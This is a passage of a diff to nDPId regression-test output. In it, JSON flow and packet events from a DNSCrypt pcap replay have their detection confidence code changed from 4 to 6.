+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":89,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304789} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ60IAub0RotsKAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc60NAAL0RYccKAAABMw96+pXaAbsCCHDfxkUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":946739304791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304791,"pkt":"ZmZmZmZmRERERERECABFAADSRcUAADIREz4pT0UNCgAAAQG723EAvtvWBsGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739304793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304793,"pkt":"ZmZmZmZmRERERERECABFAADSRcgAADIREzspT0UNCgAAAQG72usAvtxZBsSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739304804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304804,"pkt":"ZmZmZmZmRERERERECABFAADSRcQAADIREz8pT0UNCgAAAQG7lPgAviJOBsOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} @@ -209,26 +209,26 @@ 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":946739304821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739304821,"pkt":"ZmZmZmZmRERERERECABFAADTDfVAADURyF8zD3r6CgAAAQG7mF8Av3inxkSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANmtKqgh6GipMki1mJfjDA0AnYgv5x5ccE3t3oFTaUI52T95jfN1yOwZ4Avs9tatx4lCV7PDmZkXQULOG2i1+g8X39eqNuFP4dSqiJZOoeF4tcdLtZP0Xezh1C6PMdZNUhff16o24U\/hAAAAAV9TeY1fVMsN"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1NAAL0RVBEKAAABizvIdOhUAbsCCBaGc5UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1RAAL0RVBAKAAABizvIdLjtAbsCCBaGc5EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1VAAL0RVA8KAAABizvIdMSfAbsCCBaGc5MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1YgAL0RcE4KAAABizvIdKpxAbsGBMEKc5QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":106,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305155} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":106,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1YAub0RlSEKAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 